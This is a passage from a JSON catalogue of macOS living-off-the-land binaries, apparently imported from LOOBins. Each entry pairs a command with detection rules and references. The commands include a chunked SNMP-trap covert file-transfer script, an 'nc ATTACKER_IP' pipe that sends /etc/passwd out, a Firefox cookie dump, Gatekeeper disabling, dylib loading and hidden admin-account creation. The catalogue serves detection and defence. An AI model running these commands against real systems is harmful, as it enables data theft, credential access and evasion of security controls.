publishing"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/sharing.yml","https://ss64.com/mac/sharing.html","https://blog.talosintelligence.com/bad-apples-weaponizing-native-macos-primitives-for-movement-and-execution/"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:snmptrap:d22536ed519866e6","toolId":"loobins:snmptrap","toolName":"snmptrap","name":"Covert file transfer via SNMP trap payloads","source":"LOOBins","platform":["macOS"],"capability":["Lateral Movement"],"nativeCategory":["Lateral Movement","Exfiltration","Command and Control"],"command":"# On receiver: install trap handler script\nsudo tee /usr/local/bin/trap_handler.sh > /dev/null << 'EOF'\n#!/bin/bash\nTRANSFER_DIR=\"/tmp/snmp_transfers\"\nSTATE_FILE=\"/tmp/snmp_transfer_state\"\nmkdir -p \"$TRANSFER_DIR\"\nwhile read line; do\n if echo \"$line\" | grep -q \"SNMPv2-SMI::enterprises.99999.1\"; then\n DATA=$(echo \"$line\" | sed 's/.*\"\\(.*\\)\"/\\1/')\n if [[ \"$DATA\" == FILENAME:* ]]; then\n FILENAME=\"${DATA#FILENAME:}\"\n echo \"$FILENAME\" > \"$STATE_FILE\"\n > \"${TRANSFER_DIR}/${FILENAME}.b64\"\n elif [[ \"$DATA\" == DATA:* ]]; then\n if [ -f \"$STATE_FILE\" ]; then\n FILENAME=$(cat \"$STATE_FILE\")\n CHUNK=\"${DATA#DATA:}\"\n echo -n \"$CHUNK\" >> \"${TRANSFER_DIR}/${FILENAME}.b64\"\n fi\n elif [[ \"$DATA\" == \"END\" ]]; then\n if [ -f \"$STATE_FILE\" ]; then\n FILENAME=$(cat \"$STATE_FILE\")\n base64 -D < \"${TRANSFER_DIR}/${FILENAME}.b64\" > \"${TRANSFER_DIR}/${FILENAME}\"\n echo \"MD5: $(md5 -q \"${TRANSFER_DIR}/${FILENAME}\")\"\n rm \"${TRANSFER_DIR}/${FILENAME}.b64\"\n rm \"$STATE_FILE\"\n fi\n fi\n fi\ndone\nEOF\nsudo chmod +x /usr/local/bin/trap_handler.sh\n\n# On receiver: configure snmptrapd to route traps to the handler and start it\nsudo tee /etc/snmp/snmptrapd.conf > /dev/null << 'EOF'\ndisableAuthorization yes\ntraphandle default /usr/local/bin/trap_handler.sh\nEOF\nsudo snmptrapd -f -Lo\n\n# On sender: transmit file in chunks\nFILE_PATH=\"/tmp/payload.sh\"\nRECEIVER_IP=\"<RECEIVER_IP>\"\nCHUNK_SIZE=1000\nBASE64_DATA=$(base64 < \"$FILE_PATH\")\nFILE_NAME=$(basename \"$FILE_PATH\")\nsnmptrap -v 2c -c public \"$RECEIVER_IP\" '' 1.3.6.1.4.1.99999 1.3.6.1.4.1.99999.1 s \"FILENAME:$FILE_NAME\"\necho \"$BASE64_DATA\" | fold -w $CHUNK_SIZE | while read chunk; do\n snmptrap -v 2c -c public \"$RECEIVER_IP\" '' 1.3.6.1.4.1.99999 1.3.6.1.4.1.99999.1 s \"DATA:$chunk\"\n sleep 0.1\ndone\nsnmptrap -v 2c -c public \"$RECEIVER_IP\" '' 1.3.6.1.4.1.99999 1.3.6.1.4.1.99999.1 s \"END\"","description":"This technique assumes both the sender and receiver are macOS hosts. Files are base64-encoded and sent as a sequence of SNMP traps carrying chunked data under a custom OID (1.3.6.1.4.1.99999). Three message types are used - FILENAME signals the start of a transfer, DATA carries each base64 chunk, and END triggers reassembly. snmptrapd on the receiver routes all traps to a handler script that writes, reassembles, and decodes the chunks using macOS-native base64 and md5 utilities. The resulting file is verified with an MD5 hash.","mitre":[],"fullPath":["/usr/bin/snmptrap","/usr/sbin/snmptrapd"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"No detections at time of publishing","value":"No detections at time of publishing"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/snmptrap.yml","https://net-snmp.sourceforge.io/","https://blog.talosintelligence.com/bad-apples-weaponizing-native-macos-primitives-for-movement-and-execution/"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:softwareupdate:1588742f064e0e3f","toolId":"loobins:softwareupdate","toolName":"softwareupdate","name":"Get OS and browser version information","source":"LOOBins","platform":["macOS"],"capability":["Discovery"],"nativeCategory":["Discovery"],"command":"softwareupdate --list","description":"Determine OS and Safari version by enumerating the available software updates.","mitre":[],"fullPath":["/usr/sbin/softwareupdate"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"No detections at time of publishing","value":"No detections at time of publishing"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/softwareupdate.yml","https://ss64.com/osx/softwareupdate.html"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:softwareupdate:231fbe890167d3a7","toolId":"loobins:softwareupdate","toolName":"softwareupdate","name":"Get OS update policy","source":"LOOBins","platform":["macOS"],"capability":["Discovery"],"nativeCategory":["Discovery"],"command":"softwareupdate --schedule","description":"Use the --schedule flag to return the OS update policy.","mitre":[],"fullPath":["/usr/sbin/softwareupdate"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"No detections at time of publishing","value":"No detections at time of publishing"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/softwareupdate.yml","https://ss64.com/osx/softwareupdate.html"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:spctl:843d31053bd2f21e","toolId":"loobins:spctl","toolName":"spctl","name":"Disable Gatekeeper","source":"LOOBins","platform":["macOS"],"capability":["Defense Evasion"],"nativeCategory":["Defense Evasion"],"command":"sudo spctl --master-disable","description":"The --master-disable switch disables Gatekeeper. The command must be run with root/sudo permission.","mitre":[],"fullPath":["/usr/sbin/spctl"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"Elastic Detection Rules: Attempt to Disable Gatekeeper","value":"https://github.com/elastic/detection-rules/blob/e9baebc2bc18f90ae16501613cd9521a16a38ad7/rules/macos/defense_evasion_attempt_to_disable_gatekeeper.toml"},{"type":"Sigma Rules: Disable Security Tools","value":"https://github.com/SigmaHQ/sigma/blob/cd71edc09ca915f389e50df5b1bbb5ecd4b7f89d/rules/macos/process_creation/proc_creation_macos_disable_security_tools.yml"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/spctl.yml","https://disable-gatekeeper.github.io/"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:sqlite3:06ae594029f6aa24","toolId":"loobins:sqlite3","toolName":"sqlite3","name":"Get apps with Full Disk access","source":"LOOBins","platform":["macOS"],"capability":["Discovery"],"nativeCategory":["Discovery"],"command":"sqlite3 /Library/Application\\ Support/com.apple.TCC/TCC.db \\\n'select client from access where auth_value and service = \"kTCCServiceSystemPolicyAllFiles\"'","description":"The following command interacts with the TCC (Transparency, Consent, and Control) database to show the apps that have Full Disk access permission","mitre":[],"fullPath":["/usr/bin/sqlite3"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"Elastic Detection Rules: Potential Privacy Control Bypass via TCCDB Modification","value":"https://github.com/elastic/detection-rules/blob/e9baebc2bc18f90ae16501613cd9521a16a38ad7/rules/macos/defense_evasion_privacy_controls_tcc_database_modification.toml"},{"type":"Splunk Security Content: Suspicious SQLite3 LSQuarantine Behavior","value":"https://github.com/splunk/security_content/blob/c65dda5c0aa73a97f28c49c20739971ec1ba18a6/dev/endpoint/suspicious_sqlite3_lsquarantine_behavior.yml#L2"},{"type":"Jamf Protect: Detect SQLite3 activity used to associated URLs with downloaded files","value":"https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/sqlite3_downloads"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/sqlite3.yml","https://github.com/bp88/JSS-Scripts/blob/master/TCC.db%20Modifier.sh","https://redcanary.com/blog/clipping-silver-sparrows-wings/"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:sqlite3:b28bfa60a737df07","toolId":"loobins:sqlite3","toolName":"sqlite3","name":"Get Firefox cookie data","source":"LOOBins","platform":["macOS"],"capability":["Collection","Credential Access"],"nativeCategory":["Collection","Credential Access"],"command":"killall firefox; find ~/Library/Application\\ Support/Firefox/Profiles/. | grep cookies.sqlite | xargs -I {} sqlite3 {} \"select * from moz_cookies\"","description":"The following one-liner can be used to kill Firefox and dump cookie data from the user's Firefox profile.","mitre":[],"fullPath":["/usr/bin/sqlite3"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"Elastic Detection Rules: Potential Privacy Control Bypass via TCCDB Modification","value":"https://github.com/elastic/detection-rules/blob/e9baebc2bc18f90ae16501613cd9521a16a38ad7/rules/macos/defense_evasion_privacy_controls_tcc_database_modification.toml"},{"type":"Splunk Security Content: Suspicious SQLite3 LSQuarantine Behavior","value":"https://github.com/splunk/security_content/blob/c65dda5c0aa73a97f28c49c20739971ec1ba18a6/dev/endpoint/suspicious_sqlite3_lsquarantine_behavior.yml#L2"},{"type":"Jamf Protect: Detect SQLite3 activity used to associated URLs with downloaded files","value":"https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/sqlite3_downloads"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/sqlite3.yml","https://github.com/bp88/JSS-Scripts/blob/master/TCC.db%20Modifier.sh","https://redcanary.com/blog/clipping-silver-sparrows-wings/"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:sqlite3:de4f81bf94a8b374","toolId":"loobins:sqlite3","toolName":"sqlite3","name":"View URL associated with file downloads","source":"LOOBins","platform":["macOS"],"capability":["Collection","Credential Access"],"nativeCategory":["Collection","Credential Access"],"command":"sqlite3 ~/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV* 'select LSQuarantineDataURLString from LSQuarantineEvent'","description":"The following sqlite command is commonly used by macOS malware to view the URL in which the payload was downloaded from.","mitre":[],"fullPath":["/usr/bin/sqlite3"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"Elastic Detection Rules: Potential Privacy Control Bypass via TCCDB Modification","value":"https://github.com/elastic/detection-rules/blob/e9baebc2bc18f90ae16501613cd9521a16a38ad7/rules/macos/defense_evasion_privacy_controls_tcc_database_modification.toml"},{"type":"Splunk Security Content: Suspicious SQLite3 LSQuarantine Behavior","value":"https://github.com/splunk/security_content/blob/c65dda5c0aa73a97f28c49c20739971ec1ba18a6/dev/endpoint/suspicious_sqlite3_lsquarantine_behavior.yml#L2"},{"type":"Jamf Protect: Detect SQLite3 activity used to associated URLs with downloaded files","value":"https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/sqlite3_downloads"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/sqlite3.yml","https://github.com/bp88/JSS-Scripts/blob/master/TCC.db%20Modifier.sh","https://redcanary.com/blog/clipping-silver-sparrows-wings/"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:ssh-keygen:09fc4639a16866cd","toolId":"loobins:ssh-keygen","toolName":"ssh-keygen","name":"Execute malicious dynamic library (.dylib) from standard input","source":"LOOBins","platform":["macOS"],"capability":["Execution","Defense Evasion"],"nativeCategory":["Execution","Defense Evasion"],"command":"ssh-keygen -D /private/tmp/evil.dylib","description":"An attacker can execute a malicious .dylib from stdin by echoing a load command and piping to tclsh. This will bypass code signing requirements.","mitre":[],"fullPath":["/usr/bin/ssh-keygen"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"Recommendations included in resource below. No formal detection content at this time.","value":"https://medium.com/@D00MFist/generate-keys-or-generate-dylib-loads-c99ed48f323d"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/ssh-keygen.yml","https://medium.com/@D00MFist/generate-keys-or-generate-dylib-loads-c99ed48f323d"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:streamzip:d1107233f4c25cdc","toolId":"loobins:streamzip","toolName":"streamzip","name":"Copy and compress sensitive data locally","source":"LOOBins","platform":["macOS"],"capability":["Collection"],"nativeCategory":["Collection","Exfiltration"],"command":"dd if=/etc/passwd | streamzip - stream | nc ATTACKER_IP PORT","description":"The following command reads file data and compresses the data for exfiltration","mitre":[],"fullPath":["/usr/bin/streamzip"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"No detection content at time of writing","value":"No detection content at time of writing"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/streamzip.yml","https://docs.oracle.com/cd/E88353_01/html/E37839/streamzip-1.html"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:sw_vers:5efd19376b53fada","toolId":"loobins:sw_vers","toolName":"sw_vers","name":"Retrieving macOS Version Information","source":"LOOBins","platform":["macOS"],"capability":["Discovery"],"nativeCategory":["Discovery"],"command":"sw_vers","description":"Fetch detailed macOS version information including the build version, product name, and product version.","mitre":[],"fullPath":["/usr/bin/sw_vers"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"No detections at time of publishing","value":"No detections at time of publishing"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/sw_vers.yml","https://macosbin.com/bin/sw_vers","https://ss64.com/osx/sw_vers.html"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:sw_vers:6617de5f492de05f","toolId":"loobins:sw_vers","toolName":"sw_vers","name":"Retrieving macOS Product Version","source":"LOOBins","platform":["macOS"],"capability":["Discovery"],"nativeCategory":["Discovery"],"command":"sw_vers -productVersion","description":"Fetch macOS product version.","mitre":[],"fullPath":["/usr/bin/sw_vers"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"No detections at time of publishing","value":"No detections at time of publishing"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/sw_vers.yml","https://macosbin.com/bin/sw_vers","https://ss64.com/osx/sw_vers.html"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:sw_vers:b0419646786aaad1","toolId":"loobins:sw_vers","toolName":"sw_vers","name":"Retrieving macOS Product Name","source":"LOOBins","platform":["macOS"],"capability":["Discovery"],"nativeCategory":["Discovery"],"command":"sw_vers -productName","description":"Fetch detailed macOS product name.","mitre":[],"fullPath":["/usr/bin/sw_vers"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"No detections at time of publishing","value":"No detections at time of publishing"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/sw_vers.yml","https://macosbin.com/bin/sw_vers","https://ss64.com/osx/sw_vers.html"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:sw_vers:12adb0bc68d114b8","toolId":"loobins:sw_vers","toolName":"sw_vers","name":"Retrieving macOS Build Version","source":"LOOBins","platform":["macOS"],"capability":["Discovery"],"nativeCategory":["Discovery"],"command":"sw_vers -buildVersion","description":"Fetch detailed macOS build version.","mitre":[],"fullPath":["/usr/bin/sw_vers"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"No detections at time of publishing","value":"No detections at time of publishing"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/sw_vers.yml","https://macosbin.com/bin/sw_vers","https://ss64.com/osx/sw_vers.html"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:swift:db1eec9ae07ce64e","toolId":"loobins:swift","toolName":"swift","name":"Execute Swift code file","source":"LOOBins","platform":["macOS"],"capability":["Execution"],"nativeCategory":["Execution"],"command":"swift mycode.swift","description":"Executes the Swift code that is in a .swift file","mitre":[],"fullPath":["/usr/bin/swift"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"Process & Command Line Argument Detection (process contains swift)","value":"Process & Command Line Argument Detection (process contains swift)"},{"type":"Jamf Protect: Detect arbitrary code execution using a swift one-liner","value":"https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/swift_oneline_command_execution"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/swift.yml","https://developer.apple.com/swift/blog/?id=18","https://jblevins.org/log/swift","https://krakendev.io/blog/scripting-in-swift","https://blog.eidinger.info/swift-e-runs-code-directly-from-the-command-line","https://ed.com/command-line-swift/"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:swift:4774f10c89e8cf8c","toolId":"loobins:swift","toolName":"swift","name":"Execute Swift one-liner before swift 5.8 / Xcode 14.3 Beta 1","source":"LOOBins","platform":["macOS"],"capability":["Execution","Defense Evasion"],"nativeCategory":["Execution","Defense Evasion"],"command":"echo 'print(\"loobins\")' | swift -","description":"Executes a Swift one-liner by piping an echoed string into the swift command","mitre":[],"fullPath":["/usr/bin/swift"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"Process & Command Line Argument Detection (process contains swift)","value":"Process & Command Line Argument Detection (process contains swift)"},{"type":"Jamf Protect: Detect arbitrary code execution using a swift one-liner","value":"https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/swift_oneline_command_execution"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/swift.yml","https://developer.apple.com/swift/blog/?id=18","https://jblevins.org/log/swift","https://krakendev.io/blog/scripting-in-swift","https://blog.eidinger.info/swift-e-runs-code-directly-from-the-command-line","https://ed.com/command-line-swift/"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:swift:1d38d36cc5bfdc09","toolId":"loobins:swift","toolName":"swift","name":"Execute Swift one-liner with swift 5.8 / Xcode 14.3 Beta 1 or greater","source":"LOOBins","platform":["macOS"],"capability":["Execution","Defense Evasion"],"nativeCategory":["Execution","Defense Evasion"],"command":"swift -e 'import Foundation; let process = Process(); process.executableURL = URL(fileURLWithPath:\"/bin/bash\"); process.arguments = [\"-c\", \"ls -alh\"]; let stdout = Pipe(); let stderr = Pipe(); process.standardOutput = stdout; process.standardError = stderr; try process.run(); print(String(decoding: stdout.fileHandleForReading.readDataToEndOfFile(), as: UTF8.self)); print(String(decoding: stderr.fileHandleForReading.readDataToEndOfFile(), as: UTF8.self));'","description":"Executes a Swift one-liner that executes the ls command to list the current directory using the -e option that was implemented in swift 5.8 / Xcode 14.3 Beta 1","mitre":[],"fullPath":["/usr/bin/swift"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"Process & Command Line Argument Detection (process contains swift)","value":"Process & Command Line Argument Detection (process contains swift)"},{"type":"Jamf Protect: Detect arbitrary code execution using a swift one-liner","value":"https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/swift_oneline_command_execution"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/swift.yml","https://developer.apple.com/swift/blog/?id=18","https://jblevins.org/log/swift","https://krakendev.io/blog/scripting-in-swift","https://blog.eidinger.info/swift-e-runs-code-directly-from-the-command-line","https://ed.com/command-line-swift/"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:sysadminctl:b115efd1e19c6561","toolId":"loobins:sysadminctl","toolName":"sysadminctl","name":"Enable Guest Account","source":"LOOBins","platform":["macOS"],"capability":[],"nativeCategory":["Initial Access"],"command":"sudo sysadminctl -guestAccount on","description":"sysadminctl can be used to enable the guest account","mitre":[],"fullPath":["/usr/sbin/sysadminctl"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"Sigma: Creation Of A Local User Account","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_create_account.yml"},{"type":"Sigma: User Added To Admin Group Via Sysadminctl","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_sysadminctl_add_user_to_admin_group.yml"},{"type":"Sigma: Guest Account Enabled Via Sysadminctl","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_sysadminctl_enable_guest_account.yml"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/sysadminctl.yml","https://ss64.com/mac/sysadminctl.html"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:sysadminctl:08b699f562d93afa","toolId":"loobins:sysadminctl","toolName":"sysadminctl","name":"Create Local User Account","source":"LOOBins","platform":["macOS"],"capability":["Persistence"],"nativeCategory":["Persistence"],"command":"sudo sysadminctl -addUser randomUser -password \"randomPassword\"","description":"sysadminctl can be used to create a local user account","mitre":[],"fullPath":["/usr/sbin/sysadminctl"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"Sigma: Creation Of A Local User Account","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_create_account.yml"},{"type":"Sigma: User Added To Admin Group Via Sysadminctl","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_sysadminctl_add_user_to_admin_group.yml"},{"type":"Sigma: Guest Account Enabled Via Sysadminctl","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_sysadminctl_enable_guest_account.yml"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/sysadminctl.yml","https://ss64.com/mac/sysadminctl.html"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:sysadminctl:5ac210cb243ba82b","toolId":"loobins:sysadminctl","toolName":"sysadminctl","name":"Create a Local Admin Account","source":"LOOBins","platform":["macOS"],"capability":["Persistence"],"nativeCategory":["Persistence"],"command":"sudo sysadminctl -addUser randomUser -password \"randomPassword\" -admin","description":"sysadminctl can be used to create a local admin account","mitre":[],"fullPath":["/usr/sbin/sysadminctl"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"Sigma: Creation Of A Local User Account","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_create_account.yml"},{"type":"Sigma: User Added To Admin Group Via Sysadminctl","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_sysadminctl_add_user_to_admin_group.yml"},{"type":"Sigma: Guest Account Enabled Via Sysadminctl","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_sysadminctl_enable_guest_account.yml"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/sysadminctl.yml","https://ss64.com/mac/sysadminctl.html"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:sysadminctl:f4e8242891928d05","toolId":"loobins:sysadminctl","toolName":"sysadminctl","name":"Reset user password","source":"LOOBins","platform":["macOS"],"capability":["Persistence"],"nativeCategory":["Persistence"],"command":"sudo sysadminctl -resetPasswordFor randomUser -newPassword \"randomPassword\"","description":"sysadminctl can be used to reset password for a particular user account","mitre":[],"fullPath":["/usr/sbin/sysadminctl"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"Sigma: Creation Of A Local User Account","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_create_account.yml"},{"type":"Sigma: User Added To Admin Group Via Sysadminctl","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_sysadminctl_add_user_to_admin_group.yml"},{"type":"Sigma: Guest Account Enabled Via Sysadminctl","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_sysadminctl_enable_guest_account.yml"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/sysadminctl.yml","https://ss64.com/mac/sysadminctl.html"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:sysadminctl:27d8e96a6674435a","toolId":"loobins:sysadminctl","toolName":"sysadminctl","name":"Delete a local account","source":"LOOBins","platform":["macOS"],"capability":[],"nativeCategory":["Impact"],"command":"sudo sysadminctl -deleteUser randomUser","description":"sysadminctl can delete the specified user account","mitre":[],"fullPath":["/usr/sbin/sysadminctl"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"Sigma: Creation Of A Local User Account","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_create_account.yml"},{"type":"Sigma: User Added To Admin Group Via Sysadminctl","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_sysadminctl_add_user_to_admin_group.yml"},{"type":"Sigma: Guest Account Enabled Via Sysadminctl","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_sysadminctl_enable_guest_account.yml"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/sysadminctl.yml","https://ss64.com/mac/sysadminctl.html"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:sysadminctl:22d7cd044623e281","toolId":"loobins:sysadminctl","toolName":"sysadminctl","name":"Enable SMB Guest Access","source":"LOOBins","platform":["macOS"],"capability":[],"nativeCategory":["Exfiltration"],"command":"sudo sysadminctl -smbGuestAccess on","description":"sysadminctl can enable SMB Guest Access","mitre":[],"fullPath":["/usr/sbin/sysadminctl"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"Sigma: Creation Of A Local User Account","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_create_account.yml"},{"type":"Sigma: User Added To Admin Group Via Sysadminctl","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_sysadminctl_add_user_to_admin_group.yml"},{"type":"Sigma: Guest Account Enabled Via Sysadminctl","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_sysadminctl_enable_guest_account.yml"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/sysadminctl.yml","https://ss64.com/mac/sysadminctl.html"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:sysadminctl:871ffb7fecbb33cb","toolId":"loobins:sysadminctl","toolName":"sysadminctl","name":"Enable AFP Guest Access","source":"LOOBins","platform":["macOS"],"capability":[],"nativeCategory":["Exfiltration"],"command":"sudo sysadminctl -afpGuestAccess on","description":"sysadminctl can enable AFP Guest Access","mitre":[],"fullPath":["/usr/sbin/sysadminctl"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"Sigma: Creation Of A Local User Account","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_create_account.yml"},{"type":"Sigma: User Added To Admin Group Via Sysadminctl","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_sysadminctl_add_user_to_admin_group.yml"},{"type":"Sigma: Guest Account Enabled Via 